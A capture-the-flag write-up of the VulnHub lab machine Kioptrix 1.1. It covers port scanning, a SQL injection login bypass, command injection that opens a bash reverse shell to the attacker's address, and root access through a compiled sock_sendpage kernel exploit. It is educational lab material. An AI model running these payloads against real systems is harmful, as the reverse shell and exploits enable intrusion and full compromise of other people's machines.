Kioptrix 1.1 ~ VulnHub
Enumeration
NMAP
First, I went ahead and launched a port scan against the target machine.
nmap -Pn -A -sV -p- $target
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 64 OpenSSH 3.9p1 (protocol 1.99)
|_sshv1: Server supports SSHv1
80/tcp open http syn-ack ttl 64 Apache httpd 2.0.52 ((CentOS))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
111/tcp open rpcbind syn-ack ttl 64 2 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100024 1 615/udp status
|_ 100024 1 618/tcp status
443/tcp open ssl/https? syn-ack ttl 64
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--/organizationalUnitName=SomeOrganizationalUnit/[email protected]/localityName=SomeCity
| Issuer: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--/organizationalUnitName=SomeOrganizationalUnit/[email protected]/localityName=SomeCity
618/tcp open status syn-ack ttl 64 1 (RPC #100024)
631/tcp open ipp syn-ack ttl 64 CUPS 1.1
| http-methods:
| Supported Methods: GET HEAD OPTIONS POST PUT
|_ Potentially risky methods: PUT
|_http-server-header: CUPS/1.1
|_http-title: 403 Forbidden
3306/tcp open mysql syn-ack ttl 64 MySQL (unauthorized)
MAC Address: 00:0C:29:A3:ED:9F (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.30
WEB - 80
/cgi-bin/ (Status: 403) [Size: 289]
/cgi-bin/.html (Status: 403) [Size: 294]
/index.php (Status: 200) [Size: 667]
/index.php (Status: 200) [Size: 667]
/manual (Status: 301) [Size: 315]
/usage (Status: 403) [Size: 286]
/

/manual

Exploitation
Authentication Bypass
The web app was vulnerable to SQL Injection Authentication Bypass as shown below.
admin' or '1'='1'#
http://192.168.0.132/index.php


Command Injection
I noticed that the web app executed commands on the base system based on user input.


Thus, I decided to try and inject custom commands into this field to trigger the system to run it.
127.0.0.1 && whoami


As seen above, I was able to get command execution on the machine via the web portal. I then used this vulnerability to get a reverse shell back to my attack box as follows.
127.0.0.1 && bash -i >& /dev/tcp/192.168.0.108/443 0>&1


And it worked!
Privilege Escalation
Linpeas
While running linpeas, I noticed that the box was running a pretty old linux kernel version (2.6.9-55.EL).

Searchsploit
I then made my way to searchsploit to look for a kernel exploit that would fit this particular target.
searchsploit linux 2.6 centos

Linux Kernel 2.4.x/2.6.x (CentOS 4.8/5.3 / RHEL 4.8/5.3 / SuSE 10 SP2/11 / Ubuntu 8.10) (PPC) - 'sock_sendpage()' | linux/local/9545.c
This was the exploit I ended up going with this!

GCC
I then transferred the file over to the remote machine before compiling it with GCC. This was to ensure that the architecture matched the executable in the end.

gcc -o exploit 9545.c

However, I ran into the shown error. All C source files need a newline at the end of the file for compilation. I just had to add that before compiling again.


After fixing that, the exploit compiled with no issues.
Rooty

And I was the root user! 😁
-Nee